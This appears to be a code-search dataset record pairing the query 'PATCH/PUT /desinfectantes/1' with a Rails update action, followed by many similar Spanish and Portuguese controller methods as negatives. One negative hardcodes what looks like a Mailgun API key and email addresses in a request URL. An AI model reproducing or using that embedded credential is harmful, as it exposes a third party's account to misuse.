"0.5291239",
"0.5289629",
"0.5289595",
"0.528723",
"0.528676",
"0.52855235",
"0.52811676",
"0.52791685",
"0.5277106",
"0.52684367",
"0.52669674",
"0.52640635",
"0.52598536",
"0.5259335",
"0.5255984",
"0.52473485",
"0.52457327",
"0.524465",
"0.52428",
"0.5242118",
"0.52393293",
"0.52328926",
"0.5229083"
] |
0.66236925
|
1
|
PATCH/PUT /desinfectantes/1
PATCH/PUT /desinfectantes/1.json
|
def update
  respond_to do |format|
    # @desinfectante is expected to be loaded beforehand (conventionally via a before_action)
    if @desinfectante.update(desinfectante_params)
      # Success: redirect the browser, or return the updated record as JSON
      format.html { redirect_to @desinfectante, notice: 'Desinfectante was successfully updated.' }
      format.json { render :show, status: :ok, location: @desinfectante }
    else
      # Validation failure: re-render the edit form, or return the errors as JSON
      format.html { render :edit }
      format.json { render json: @desinfectante.errors, status: :unprocessable_entity }
    end
  end
end
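
The update action assumes @desinfectante has already been loaded. A sketch of the conventional wiring is shown below; the controller class name and the before_action callback are assumptions based on standard Rails scaffold layout, while set_desinfectante itself appears verbatim among the related methods in this record.

class DesinfectantesController < ApplicationController
  # Load the record once for the member actions (assumed scaffold convention)
  before_action :set_desinfectante, only: [:show, :edit, :update, :destroy]

  private

  # Shared finder used by the before_action above
  def set_desinfectante
    @desinfectante = Desinfectante.find(params[:id])
  end
end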
|
{
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
}
|
[
"def update\n @servicio = Servicio.find(params[:id])\n\n respond_to do |format|\n if @servicio.update_attributes(params[:servicio])\n format.html { redirect_to @servicio, :notice => 'Servicio was successfully updated.' }\n format.json { head :no_content }\n else\n format.html { render :action => \"edit\" }\n format.json { render :json => @servicio.errors, :status => :unprocessable_entity }\n end\n end\n end",
"def update\n @detalle = Detalle.find(params[:id])\n\n respond_to do |format|\n if @detalle.update_attributes(params[:detalle])\n format.html { redirect_to @detalle, notice: 'Detalle was successfully updated.' }\n format.json { head :no_content }\n else\n format.html { render action: \"edit\" }\n format.json { render json: @detalle.errors, status: :unprocessable_entity }\n end\n end\n end",
"def update\n respond_to do |format|\n if @objeto.update(detalle_pedido_params)\n set_redireccion\n format.html { redirect_to @redireccion, notice: 'Detalle pedido was successfully updated.' }\n format.json { render :show, status: :ok, location: @objeto }\n else\n format.html { render :edit }\n format.json { render json: @objeto.errors, status: :unprocessable_entity }\n end\n end\n end",
"def update\n obtener_datos()\n @status = params[:statusproyect]\n @cliente = params[:cliente] + \" \" +params[:cliente_apellido]\n respond_to do |format|\n if @ventum.update(cliente: @cliente, clave:@clave, fecha:@fecha, iva:@iva,subtotal:@preciofinal ,total:@totalcosto, descuentogeneral: @descglobal , distribuidor: @distribuidor, status: @status)\n @detail.each do |x|\n x.destroy\n end\n salvar()\n format.html { redirect_to @ventum, notice: 'Venta actualizada correctamente.' }\n format.json { render :show, status: :ok, location: @ventum }\n else\n format.html { render :edit }\n format.json { render json: @ventum.errors, status: :unprocessable_entity }\n end\n end\n end",
"def actualizacion \n fiesta.update (params[:id]) \n render json: fiesta\n end",
"def update\n @oferta = Oferta.find(params[:id])\n\n respond_to do |format|\n if @oferta.update_attributes(params[:oferta])\n format.html { redirect_to [:admin, @oferta], :notice => 'Exemplo was successfully updated.' }\n format.json { head :ok }\n else\n format.html { render :action => \"edit\" }\n format.json { render :json => @oferta.errors, :status => :unprocessable_entity }\n end\n end\n end",
"def update\n respond_to do |format|\n if @sivic_discipulo.update(sivic_discipulo_params_netested)\n format.html { redirect_to @sivic_discipulo, notice: 'Registro alterado com sucesso.' }\n format.json { head :no_content }\n else\n format.html { render action: 'edit' }\n format.json { render json: @sivic_discipulo.errors, status: :unprocessable_entity }\n end\n end\n end",
"def update\n respond_to do |format|\n if @servico_pacote.update(servico_pacote_params)\n format.html { redirect_to @servico_pacote, notice: 'Pacote was successfully updated.' }\n format.json { head :no_content }\n else\n format.html { render action: 'edit' }\n format.json { render json: @servico_pacote.errors, status: :unprocessable_entity }\n end\n end\n end",
"def update\n respond_to do |format|\n if @detalle.update(detalle_params)\n format.html { redirect_to @detalle, notice: 'Detalle was successfully updated.' }\n format.json { render :show, status: :ok, location: @detalle }\n else\n format.html { render :edit }\n format.json { render json: @detalle.errors, status: :unprocessable_entity }\n end\n end\n end",
"def update\n @telefon = Telefon.find(params[:id])\n @telefon.update_attributes(params[:telefon])\n respond_with(@telefon)\n end",
"def update\n respond_to do |format|\n if @tipo_de_servicio.update(tipo_de_servicio_params)\n format.html { redirect_to @tipo_de_servicio, notice: 'Tipo de servicio was successfully updated.' }\n format.json { render :show, status: :ok, location: @tipo_de_servicio }\n else\n format.html { render :edit }\n format.json { render json: @tipo_de_servicio.errors, status: :unprocessable_entity }\n end\n end\n end",
"def patch\n headers = {\"If-Match\" => @version}\n response = @context.request :patch, \"#{@path}/#{@id}\", @data.to_json, headers\n @version += 1\n response\n # 'X-HTTP-Method-Override' => 'PATCH'\n end",
"def patch!\n request! :patch\n end",
"def update\n @solicitud_servicio = SolicitudServicio.find(params[:id])\n\n respond_to do |format|\n if @solicitud_servicio.update_attributes(params[:solicitud_servicio])\n format.html { redirect_to @solicitud_servicio, notice: 'Solicitud servicio was successfully updated.' }\n format.json { head :no_content }\n else\n format.html { render action: \"edit\" }\n format.json { render json: @solicitud_servicio.errors, status: :unprocessable_entity }\n end\n end\n end",
"def update\n respond_to do |format|\n if @cliente.update(cliente_params)\n #--ADICIONADO\n \t @cliente.perfilclientes.destroy_all()\n if params[:cliente][:perfil_ids]\n \t\tparams[:cliente][:perfil_ids].each do |ss|\n \t\t\t@cliente.perfilclientes.create(:cliente_id => @cliente.id, :perfil_id => ss)\n \t\tend\n end\n #--ADICIONADO\n format.html { redirect_to clientes_url, notice: 'Cliente actualizado com sucesso.' }\n format.json { head :no_content }\n else\n format.html { render action: 'edit' }\n format.json { render json: @cliente.errors, status: :unprocessable_entity }\n end\n end\n end",
"def update\n @respuesta = Respuesta.find(params[:id])\n\n respond_to do |format|\n if @respuesta.update_attributes(params[:respuesta])\n format.html { redirect_to @respuesta, notice: 'Respuesta was successfully updated.' }\n format.json { head :no_content }\n else\n format.html { render action: \"edit\" }\n format.json { render json: @respuesta.errors, status: :unprocessable_entity }\n end\n end\n end",
"def update\n @veiculo = Veiculo.find(params[:id])\n\n respond_to do |format|\n if @veiculo.update_attributes(params[:veiculo])\n format.html { redirect_to @veiculo, :notice => 'Veiculo was successfully updated.' }\n format.json { head :no_content }\n else\n format.html { render :action => \"edit\" }\n format.json { render :json => @veiculo.errors, :status => :unprocessable_entity }\n end\n end\n end",
"def update\n @fulcliente = Fulcliente.find(params[:id])\n\n respond_to do |format|\n if @fulcliente.update_attributes(params[:fulcliente])\n format.html { redirect_to @fulcliente, notice: 'Fulcliente was successfully updated.' }\n format.json { head :ok }\n else\n format.html { render action: \"edit\" }\n format.json { render json: @fulcliente.errors, status: :unprocessable_entity }\n end\n end\n end",
"def update\n respond_to do |format|\n if @detalhe.update(detalhe_params)\n format.html { redirect_to @detalhe, notice: 'Detalhe was successfully updated.' }\n format.json { head :no_content }\n else\n format.html { render action: 'edit' }\n format.json { render json: @detalhe.errors, status: :unprocessable_entity }\n end\n end\n end",
"def update\n @safra_verdoso = SafraVerdoso.find(params[:id])\n\n respond_to do |format|\n if @safra_verdoso.update_attributes(params[:safra_verdoso])\n format.html { redirect_to \"/safra_produtos/#{@safra_verdoso.safra_produto_id}/descontos\"}\n format.json { head :no_content }\n else\n format.html { render action: \"edit\" }\n format.json { render json: @safra_verdoso.errors, status: :unprocessable_entity }\n end\n end\n end",
"def activo_update\n respond_to do |format|\n activo = params[:laboratorio][:activo]\n id = params[:id]\n Laboratorio.where(id: id).update_all(activo: activo )\n msg = { :status => \"ok\", :message => \"Actualizado!\" }\n format.json { render :json => msg }\n end\n end",
"def update\n @respuesta = Respuesta.find(params[:id])\n\n if @respuesta.update(params[:respuesta])\n head :no_content\n else\n render json: @respuesta.errors, status: :unprocessable_entity\n end\n end",
"def update\n @deuda = Deuda.find(params[:id])\n\n# XXX: http://stackoverflow.com/questions/5629402/how-to-test-if-parameters-exist-in-rails\n if(params[:deuda].has_key?(:deuda_original_id))\n logger.debug(\"Se slecciono deuda original\")\n if(@deuda.credito.present?)\n logger.debug(\"Estaba asociado con un credito\")\n# XXX: http://stackoverflow.com/questions/12023854/rails-remove-child-association-from-parent\n @deuda.credito.deudas.delete(@deuda)\n end\n @deuda.credito_id=nil\n end\n\n respond_to do |format|\n if @deuda.update_attributes(params[:deuda])\n format.html { redirect_to @deuda, notice: 'Deuda was successfully updated.' }\n format.json { head :no_content }\n else\n format.html { render action: \"edit\" }\n format.json { render json: @deuda.errors, status: :unprocessable_entity }\n end\n end\n end",
"def update\n @calificacion_servicio = CalificacionServicio.find(params[:id])\n\n respond_to do |format|\n if @calificacion_servicio.update_attributes(params[:calificacion_servicio])\n format.html { redirect_to @calificacion_servicio, notice: 'Calificacion servicio was successfully updated.' }\n format.json { head :no_content }\n else\n format.html { render action: \"edit\" }\n format.json { render json: @calificacion_servicio.errors, status: :unprocessable_entity }\n end\n end\n end",
"def update\n @compra_detalle = CompraDetalle.find(params[:id])\n\n respond_to do |format|\n if @compra_detalle.update_attributes(params[:compra_detalle])\n format.html { redirect_to @compra_detalle, notice: 'Compra detalle was successfully updated.' }\n format.json { head :no_content }\n else\n format.html { render action: \"edit\" }\n format.json { render json: @compra_detalle.errors, status: :unprocessable_entity }\n end\n end\n end",
"def update\n respond_to do |format|\n if @servico.update(servico_params)\n format.html { redirect_to servicos_url, notice: 'Serviço atualizado com sucesso.' }\n format.json { render :show, status: :ok, location: @servico }\n else\n format.html { render :edit }\n format.json { render json: @servico.errors, status: :unprocessable_entity }\n end\n end\n end",
"def update\n @serv_adicionale = ServAdicionale.find(params[:id])\n\n respond_to do |format|\n if @serv_adicionale.update_attributes(params[:serv_adicionale])\n format.html { redirect_to @serv_adicionale, notice: 'Serv adicionale was successfully updated.' }\n format.json { head :no_content }\n else\n format.html { render action: \"edit\" }\n format.json { render json: @serv_adicionale.errors, status: :unprocessable_entity }\n end\n end\n end",
"def update\n respond_to do |format|\n if @objeto.update(etiqueta_params)\n format.html { redirect_to @objeto, notice: 'Etiqueta was successfully updated.' }\n format.json { render :show, status: :ok, location: @objeto }\n else\n format.html { render :edit }\n format.json { render json: @objeto.errors, status: :unprocessable_entity }\n end\n end\n end",
"def update\n @dependencia = Dependencia.find(params[:id])\n\n respond_to do |format|\n if @dependencia.update_attributes(dependencia_params)\n format.html { redirect_to @dependencia, notice: 'Dependencia se actualizo correctamente.' }\n format.json { head :no_content }\n format.js{}\n else\n format.html { render action: \"edit\" }\n format.json { render json: @dependencia.errors, status: :unprocessable_entity }\n format.js{}\n end\n end\n end",
"def update\n @consumo = Consumo.find(params[:id])\n\n respond_to do |format|\n if @consumo.update_attributes(params[:consumo])\n format.html { redirect_to @consumo.cliente, :notice => 'Consumo alterado com sucesso.' }\n format.json { head :no_content }\n else\n format.html { render :action => \"edit\" }\n format.json { render :json => @consumo.errors, :status => :unprocessable_entity }\n end\n end\n end",
"def update\n respond_to do |format|\n if @asiento_de_servicio.update(asiento_de_servicio_params)\n format.html { redirect_to @asiento_de_servicio, notice: 'Asiento de servicio was successfully updated.' }\n format.json { render :show, status: :ok, location: @asiento_de_servicio }\n else\n format.html { render :edit }\n format.json { render json: @asiento_de_servicio.errors, status: :unprocessable_entity }\n end\n end\n end",
"def update\n respond_to do |format|\n if @clientes_servico.update(clientes_servico_params)\n format.html { redirect_to @clientes_servico, notice: 'Clientes servico was successfully updated.' }\n format.json { head :no_content }\n else\n format.html { render action: 'edit' }\n format.json { render json: @clientes_servico.errors, status: :unprocessable_entity }\n end\n end\n end",
"def update\n respond_to do |format|\n if @os_entregavel.update(os_entregavel_params)\n if @os_entregavel.ordem_servico.id!=nil\n format.html { redirect_to \"/ordem_servicos/\"+@os_entregavel.ordem_servico.id.to_s, notice: 'Os entregavel foi atualizado(a)' }\n format.json { head :no_content }\n else\n format.html { redirect_to @os_entregavel, notice: 'Os entregavel foi atualizado(a)' }\n format.json { render :show, status: :ok, location: @os_entregavel }\n end\n else\n format.html { render :edit }\n format.json { render json: @os_entregavel.errors, status: :unprocessable_entity }\n end\n end\n end",
"def update\n respond_to do |format|\n if @repuesto_servicio.update(repuesto_servicio_params)\n format.html { redirect_to @repuesto_servicio, notice: 'Repuesto o servicio fue actualizado con éxito.' }\n format.json { render :show, status: :ok, location: @repuesto_servicio }\n else\n format.html { render :edit }\n format.json { render json: @repuesto_servicio.errors, status: :unprocessable_entity }\n end\n end\n end",
"def update\n @sugerencia = Sugerencia.find(params[:id])\n\n respond_to do |format|\n if @sugerencia.update_attributes(params[:sugerencia])\n format.html { redirect_to @sugerencia, :notice => 'Sugerencia was successfully updated.' }\n format.json { head :ok }\n else\n format.html { render :action => \"edit\" }\n format.json { render :json => @sugerencia.errors, :status => :unprocessable_entity }\n end\n end\n end",
"def update\n respond_to do |format|\n if @objeto.update(cliente_params)\n set_redireccion\n format.html { redirect_to @redireccion, notice: 'Cliente was successfully updated.' }\n format.json { render :show, status: :ok, location: @objeto }\n else\n format.html { render :edit }\n format.json { render json: @objeto.errors, status: :unprocessable_entity }\n end\n end\n end",
"def update\n respond_to do |format|\n if @desafio.update(desafio_params)\n format.html { redirect_to @desafio, notice: 'Desafio was successfully updated.' }\n format.json { render :show, status: :ok, location: @desafio }\n else\n format.html { render :edit }\n format.json { render json: @desafio.errors, status: :unprocessable_entity }\n end\n end\n end",
"def update\n @endereco = Endereco.find(params[:id])\n\n respond_to do |format|\n if @endereco.update_attributes(params[:endereco])\n format.html { redirect_to \"/dados\", notice: 'O endereço foi alterado com sucesso.' }\n format.json { head :no_content }\n else\n format.html { render action: \"edit\" }\n format.json { render json: @endereco.errors, status: :unprocessable_entity }\n end\n end\n end",
"def update\n @depoevento = Depoevento.find(params[:id])\n\n respond_to do |format|\n if @depoevento.update_attributes(params[:depoevento])\n format.html { redirect_to @depoevento, notice: 'Depoevento was successfully updated.' }\n format.json { head :ok }\n else\n format.html { render action: \"edit\" }\n format.json { render json: @depoevento.errors, status: :unprocessable_entity }\n end\n end\n end",
"def update\n @lista_contato = ListaContato.find(params[:id])\n\n respond_to do |format|\n if @lista_contato.update_attributes(params[:lista_contato])\n format.html { redirect_to @lista_contato, notice: 'Lista contato was successfully updated.' }\n format.json { head :no_content }\n else\n format.html { render action: \"edit\" }\n format.json { render json: @lista_contato.errors, status: :unprocessable_entity }\n end\n end\n end",
"def update\n respond_to do |format|\n if @contador.update(contador_params)\n format.html { redirect_to @contador, notice: 'Contador was successfully updated.' }\n format.json { head :no_content }\n else\n format.html { render action: 'edit' }\n format.json { render json: @contador.errors, status: :unprocessable_entity }\n end\n end\n end",
"def update\n @tecnico = Tecnico.find(params[:id])\n\n respond_to do |format|\n if @tecnico.update_attributes(params[:tecnico])\n format.html { redirect_to @tecnico, notice: 'Tecnico atualizado com sucesso.' }\n format.json { head :no_content }\n else\n format.html { render action: \"edit\" }\n format.json { render json: @tecnico.errors, status: :unprocessable_entity }\n end\n end\n end",
"def update\n @clientepedido = Clientepedido.find(params[:id])\n\n respond_to do |format|\n if @clientepedido.update_attributes(params[:clientepedido])\n format.html { redirect_to @clientepedido, notice: 'EL pedido fue actualizado.' }\n format.json { head :no_content }\n else\n format.html { render action: \"edit\" }\n format.json { render json: @clientepedido.errors, status: :unprocessable_entity }\n end\n end\n end",
"def update\n respond_to do |format|\n if @inicio.update(inicio_params)\n format.html { redirect_to @inicio, notice: 'Inicio was successfully updated.' }\n format.json { render :show, status: :ok, location: @inicio }\n else\n format.html { render :edit }\n format.json { render json: @inicio.errors, status: :unprocessable_entity }\n end\n end\n end",
"def update\n respond_to do |format|\n if @serie_detalle.update(serie_detalle_params)\n format.html { redirect_to @serie_detalle, notice: 'Serie detalle was successfully updated.' }\n format.json { render :show, status: :ok, location: @serie_detalle }\n else\n format.html { render :edit }\n format.json { render json: @serie_detalle.errors, status: :unprocessable_entity }\n end\n end\n end",
"def update\n @espacio_deportivo = EspacioDeportivo.find(params[:id])\n\n respond_to do |format|\n if @espacio_deportivo.update_attributes(params[:espacio_deportivo])\n format.html { redirect_to root_url, :notice => \"Se actualizo correctamente el espacio deportivo\" }\n format.json { head :no_content }\n else\n format.html { render action: \"edit\" }\n format.json { render json: @espacio_deportivo.errors, status: :unprocessable_entity }\n end\n end\n end",
"def activo_update\n respond_to do |format|\n activo = params[:producto][:activo]\n id = params[:id]\n Producto.where(id: id).update_all(activo: activo )\n msg = { :status => \"ok\", :message => \"Actualizado!\" }\n format.json { render :json => msg }\n end\n end",
"def update\n respond_to do |format|\n if @tb_servicio.update(tb_servicio_params)\n format.html { redirect_to @tb_servicio, notice: 'Tb servicio was successfully updated.' }\n format.json { render :show, status: :ok, location: @tb_servicio }\n else\n format.html { render :edit }\n format.json { render json: @tb_servicio.errors, status: :unprocessable_entity }\n end\n end\n end",
"def update\n @dossier = Dossier.find(params[:id])\n \n respond_to do |format|\n if @dossier.update_attributes(params[:dossier])\n format.html { redirect_to(@dossier, :notice => 'Dossier was successfully updated.') }\n format.xml { head :ok }\n format.json { render :json => { :success => true, :message => \"Updated Dossier #{@dossier.id}\", :data => @dossier.attributes.merge(:institution_nom => @dossier.institution.nom, :type_etat_dossier_description => @dossier.type_etat_dossier.try(:description), :juge_mission_id => @dossier.juge_mission.try(:contact_id), :juge_controlleur_id => @dossier.juge_controlleur.try(:contact_id))}}\n \n else\n format.html { render :action => \"edit\" }\n format.xml { render :xml => @dossier.errors, :status => :unprocessable_entity }\n end\n end\n end",
"def update\n respond_to do |format|\n if @tipoapreensao.update(tipoapreensao_params)\n format.html { redirect_to @tipoapreensao, notice: 'Tipoapreensao was successfully updated.' }\n format.json { head :no_content }\n else\n format.html { render action: 'edit' }\n format.json { render json: @tipoapreensao.errors, status: :unprocessable_entity }\n end\n end\n end",
"def api_patch(path, data = {})\n api_request(:patch, path, :data => data)\n end",
"def update\n @faixa_de_desconto = FaixaDeDesconto.find(params[:id])\n\n respond_to do |format|\n if @faixa_de_desconto.update_attributes(params[:faixa_de_desconto])\n flash[:notice] = 'FaixaDeDesconto was successfully updated.'\n format.html { redirect_to(@faixa_de_desconto) }\n format.xml { head :ok }\n else\n format.html { render :action => \"edit\" }\n format.xml { render :xml => @faixa_de_desconto.errors, :status => :unprocessable_entity }\n end\n end\n end",
"def update\n respond_to do |format|\n if @telefone_cliente.update(telefone_cliente_params)\n format.html { redirect_to @telefone_cliente, notice: 'Telefone cliente was successfully updated.' }\n format.json { render :show, status: :ok, location: @telefone_cliente }\n else\n format.html { render :edit }\n format.json { render json: @telefone_cliente.errors, status: :unprocessable_entity }\n end\n end\n end",
"def update\n respond_to do |format|\n if @contatos_cliente.update(contatos_cliente_params)\n format.html { redirect_to @contatos_cliente, notice: 'Contatos cliente was successfully updated.' }\n format.json { render :show, status: :ok, location: @contatos_cliente }\n else\n format.html { render :edit }\n format.json { render json: @contatos_cliente.errors, status: :unprocessable_entity }\n end\n end\n end",
"def update\n @asiento = Asiento.find(params[:id])\n\n respond_to do |format|\n if @asiento.update_attributes(params[:asiento])\n format.html { redirect_to @asiento, :notice => 'El apunte fue cambiado.' }\n format.json { head :ok }\n else\n format.html { render :action => \"edit\" }\n format.json { render :json => @asiento.errors, :status => :unprocessable_entity }\n end\n end\n end",
"def update\n @sitio_entrega = SitioEntrega.find(params[:id])\n\n respond_to do |format|\n if @sitio_entrega.update_attributes(params[:sitio_entrega])\n format.html { redirect_to @sitio_entrega, notice: 'Sitio entrega was successfully updated.' }\n format.json { head :no_content }\n else\n format.html { render action: \"edit\" }\n format.json { render json: @sitio_entrega.errors, status: :unprocessable_entity }\n end\n end\n end",
"def update\n respond_to do |format|\n if @entrega.update(entrega_params)\n format.html { redirect_to @entrega, notice: 'Entrega editada con éxito.' }\n format.json { render :show, status: :ok, location: @entrega }\n else\n format.html { render :edit }\n format.json { render json: @entrega.errors, status: :unprocessable_entity }\n end\n end\n end",
"def activo_update\n respond_to do |format|\n activo = params[:presentacion][:activo]\n id = params[:id]\n Presentacion.where(id: id).update_all(activo: activo )\n msg = { :status => \"ok\", :message => \"Actualizado!\" }\n format.json { render :json => msg }\n end\n end",
"def update\n respond_to do |format|\n if @solicitud.update(solicitud_params)\n format.html { redirect_to @solicitud, notice: 'Solicitud was successfully updated.' }\n format.json { head :no_content }\n else\n format.html { render action: 'edit' }\n format.json { render json: @solicitud.errors, status: :unprocessable_entity }\n end\n end\n end",
"def update\n respond_to do |format|\n if @informacioncomercial.update(informacioncomercial_params)\n format.html { redirect_to @informacioncomercial, notice: 'Informacioncomercial was successfully updated.' }\n format.json { render :show, status: :ok, location: @informacioncomercial }\n else\n format.html { render :edit }\n format.json { render json: @informacioncomercial.errors, status: :unprocessable_entity }\n end\n end\n end",
"def update\n @objet = Objet.find(params[:id])\n\n respond_to do |format|\n if @objet.update_attributes(params[:objet])\n format.html { redirect_to @objet, notice: 'The found item was successfully updated.' }\n format.json { head :no_content }\n else\n format.html { render action: \"edit\" }\n format.json { render json: @objet.errors, status: :unprocessable_entity }\n end\n end\n end",
"def update\n respond_to do |format|\n set_funcionario\n if @ordem_servico.update(ordem_servico_params)\n format.html { redirect_to @ordem_servico, notice: t('messages.cadastro_atualizado') }\n format.json { render :show, status: :ok, location: @ordem_servico }\n else\n format.html { render :edit }\n format.json { render json: @ordem_servico.errors, status: :unprocessable_entity }\n end\n end\n end",
"def update\n respond_to do |format|\n if @compra_venta_normal.update(compra_venta_normal_params)\n format.html { redirect_to @compra_venta_normal, notice: 'Compra venta normal was successfully updated.' }\n format.json { head :no_content }\n else\n format.html { render action: 'edit' }\n format.json { render json: @compra_venta_normal.errors, status: :unprocessable_entity }\n end\n end\n end",
"def update\n @cliente = Cliente.find(params[:id])\n\n respond_to do |format|\n if @cliente.update_attributes(params[:cliente])\n format.html { redirect_to @cliente, notice: 'Cliente atualizado com sucesso.' }\n format.json { head :no_content }\n else\n format.html { render action: \"edit\" }\n format.json { render json: @cliente.errors, status: :unprocessable_entity }\n end\n end\n end",
"def update\n respond_to do |format|\n if @tiposveiculo.update(tiposveiculo_params)\n format.html { redirect_to tiposveiculos_url, notice: 'Tipo de Veículo editado com sucesso.' }\n format.json { head :no_content }\n else\n format.html { render :edit }\n format.json { render json: @tiposveiculo.errors, status: :unprocessable_entity }\n end\n end\n end",
"def update\n if params[:elefe][:prix]\n params[:elefe][:info_ville] = params[:elefe][:info_ville].join(',') if params[:elefe][:info_ville] != nil\n params[:elefe][:prix] = @tarif[params[:elefe][:parentee].to_i] if params[:elefe][:parentee] != nil\n params[:elefe][:signature] = false\n cour = Cour.find_by(:id => params[:elefe][:ville_entrainement])\n cours = @elefe.cours\n if !cours.detect { |b| b.id == cour.id }\n @elefe.cours << cour\n end\n @elefe.commandes.first.update(montant: params[:elefe][:prix])\n @elefe.update_attributes(:updated_at => Time.now)\n end\n respond_to do |format|\n if @elefe.update(elefe_params)\n format.html { redirect_to @elefe, notice: 'La fiche élève a bien été modifiée.' }\n format.json { render :show, status: :ok, location: @elefe }\n else\n format.html { render :edit }\n format.json { render json: @elefe.errors, status: :unprocessable_entity }\n end\n end\n end",
"def update\n @cliente = Cliente.find(params[:id])\n\n respond_to do |format|\n if @cliente.update_attributes(params[:cliente])\n format.html { render :json => {:success => true} }\n format.xml { render :xml => @cliente, :status => :created, :location => @cliente }\n else\n format.html { render :json => ( (@cliente.errors.full_messages.join(\".<br />\").to_s + \".\").to_json ) } unless @cliente.errors.empty?\n end\n end\n end",
"def update\n respond_to do |format|\n if @registro_servicio.update(registro_servicio_params)\n format.html { redirect_to @registro_servicio, notice: 'Servicio was successfully updated.' }\n format.json { render :show, status: :ok, location: @registro_servicio }\n else\n format.html { render :edit }\n format.json { render json: @registro_servicio.errors, status: :unprocessable_entity }\n end\n end\n end",
"def update \n retorno = {erro: \"322\" ,body: \"\"}\n if @usuario.update(valid_request?)\n retorno = {erro: \"000\", body: {evento_id: @usuario.id, usuario_nome: @usuario.nome}}\n end\n render json: retorno.to_json\n end",
"def update\n @consulta = Consulta.find(params[:id])\n\n if @consulta.update(params[:consulta])\n head :no_content\n else\n render json: @consulta.errors, status: :unprocessable_entity\n end\n end",
"def update\n @productos = Car.where(:pedidoID => params[:id])\n respond_to do |format| \n if @pedido.update(pedido_params)\n \n format.html { redirect_to \"/\", notice: 'Pedido was successfully updated.' }\n format.json { render :show, status: :ok, location: @pedido }\n RestClient.post \"https://api:key-e7d79c66e74391fdf48b657624f23ddc\"\\\n \"@api.mailgun.net/v3/sandboxb9c2dadab0ea49f6b7130d1091646c59.mailgun.org/messages\",\n :from => \"Sistema de Pedidos <mailgun@sandboxb9c2dadab0ea49f6b7130d1091646c59.mailgun.org>\",\n #:to => \"proteina@sinergroup.com.mx\",\n :to => \"proteina@sinergroup.com.mx\",\n :subject => \"Solicitud de Pedido\",\n :html => (render_to_string(template: \"../views/pedidos/email\")).to_str\n else\n format.html { render :edit }\n format.json { render json: @pedido.errors, status: :unprocessable_entity }\n end\n end\n end",
"def update\n respond_to do |format|\n if @conta.update(conta_params)\n format.html { redirect_to contas_path, notice: @@titulo + t('msg.update') }\n format.json { render :show, status: :ok, location: @conta }\n else\n format.html { render :edit }\n format.json { render json: @conta.errors, status: :unprocessable_entity }\n end\n end\n end",
"def update\n respond_to do |format|\n if @nombr_comune.update(nombr_comune_params)\n format.html { redirect_to @nombr_comune, notice: 'Nombre comun was successfully updated.' }\n format.json { head :no_content }\n else\n format.html { render action: 'edit' }\n format.json { render json: @nombr_comune.errors, status: :unprocessable_entity }\n end\n end\n end",
"def update\n @selecao = Selecao.find(params[:id])\n\n respond_to do |format|\n if @selecao.update_attributes(params[:selecao])\n format.html { redirect_to @selecao, notice: 'Selecao was successfully updated.' }\n format.json { head :no_content }\n else\n format.html { render action: \"edit\" }\n format.json { render json: @selecao.errors, status: :unprocessable_entity }\n end\n end\n end",
"def update\n #parametros_autocomplete!(params[:estudiante][:persona])\n @estudiante = Estudiante.find(params[:id])\n \n begin\n @estudiante.persona_id = params[:persona][:id]\n rescue\n end\n\n respond_to do |format|\n if @estudiante.update_attributes(params[:estudiante])\n format.html { redirect_to @estudiante, notice: 'Estudiante actualizado' }\n format.json { head :no_content }\n else\n format.html { render action: \"edit\" }\n format.json { render json: @estudiante.errors, status: :unprocessable_entity }\n end\n end\n end",
"def update\n respond_to do |format|\n if @prueba_json.update(prueba_json_params)\n format.html { redirect_to @prueba_json, notice: 'Prueba json was successfully updated.' }\n format.json { head :no_content }\n else\n format.html { render action: 'edit' }\n format.json { render json: @prueba_json.errors, status: :unprocessable_entity }\n end\n end\n end",
"def update\n @tecnico = Tecnico.find(params[:id])\n\n respond_to do |format|\n if @tecnico.update_attributes(params[:tecnico])\n format.html { redirect_to @tecnico, :notice => 'Tecnico was successfully updated.' }\n format.json { head :no_content }\n else\n format.html { render :action => \"edit\" }\n format.json { render :json => @tecnico.errors, :status => :unprocessable_entity }\n end\n end\n end",
"def update\n @ejercicio = Ejercicio.find(params[:id])\n\n respond_to do |format|\n if @ejercicio.update_attributes(params[:ejercicio])\n format.html { redirect_to @ejercicio, notice: 'Ejercicio was successfully updated.' }\n format.json { head :no_content }\n else\n format.html { render action: \"edit\" }\n format.json { render json: @ejercicio.errors, status: :unprocessable_entity }\n end\n end\n end",
"def update\n @diretor = Diretor.order('nome')\n @ator = Ator.order('nome')\n\n respond_to do |format|\n if @filme.update_attributes(filme_params)\n format.html { redirect_to @filme, notice: 'O filme foi atualizado com sucesso.' }\n format.json { head :no_content }\n else\n format.html { render action: \"edit\" }\n format.json { render json: @filme.errors, status: :unprocessable_entity }\n end\n end\n end",
"def update\n @descuento = Descuento.find(params[:id])\n\n respond_to do |format|\n if @descuento.update_attributes(params[:descuento])\n format.html { redirect_to @descuento, notice: 'Descuento was successfully updated.' }\n format.json { head :no_content }\n else\n format.html { render action: \"edit\" }\n format.json { render json: @descuento.errors, status: :unprocessable_entity }\n end\n end\n end",
"def update\n respond_to do |format|\n if @cliente.update(cliente_params)\n format.html { redirect_to @cliente, notice: 'Cliente atualizado com sucesso.' }\n format.json { head :no_content }\n else\n format.html { render action: 'edit' }\n format.json { render json: @cliente.errors, status: :unprocessable_entity }\n end\n end\n end",
"def update\n respond_to do |format|\n if @oficio.update(oficio_params)\n format.html { redirect_to oficios_url, notice: 'Oficio actualizado exitosamente.' }\n format.json { render :show, status: :ok, location: oficios_url }\n else\n format.html { render :edit }\n format.json { render json: @oficio.errors, status: :unprocessable_entity }\n end\n end\n end",
"def update\n respond_to do |format|\n if @objet.update(objet_params)\n format.html { redirect_to @objet, notice: 'Objet was successfully updated.' }\n format.json { render :show, status: :ok, location: @objet }\n else\n format.html { render :edit }\n format.json { render json: @objet.errors, status: :unprocessable_entity }\n end\n end\n end",
"def update\n respond_to do |format|\n if @detalle_documento_de_compra.update(detalle_documento_de_compra_params)\n format.html { redirect_to @detalle_documento_de_compra, notice: 'Detalle documento de compra was successfully updated.' }\n format.json { render :show, status: :ok, location: @detalle_documento_de_compra }\n else\n format.html { render :edit }\n format.json { render json: @detalle_documento_de_compra.errors, status: :unprocessable_entity }\n end\n end\n end",
"def update\n respond_to do |format|\n if @solicitacao_tipo.update(solicitacao_tipo_params)\n format.html { redirect_to @solicitacao_tipo, notice: 'Solicitacao tipo was successfully updated.' }\n format.json { head :no_content }\n else\n format.html { render action: 'edit' }\n format.json { render json: @solicitacao_tipo.errors, status: :unprocessable_entity }\n end\n end\n end",
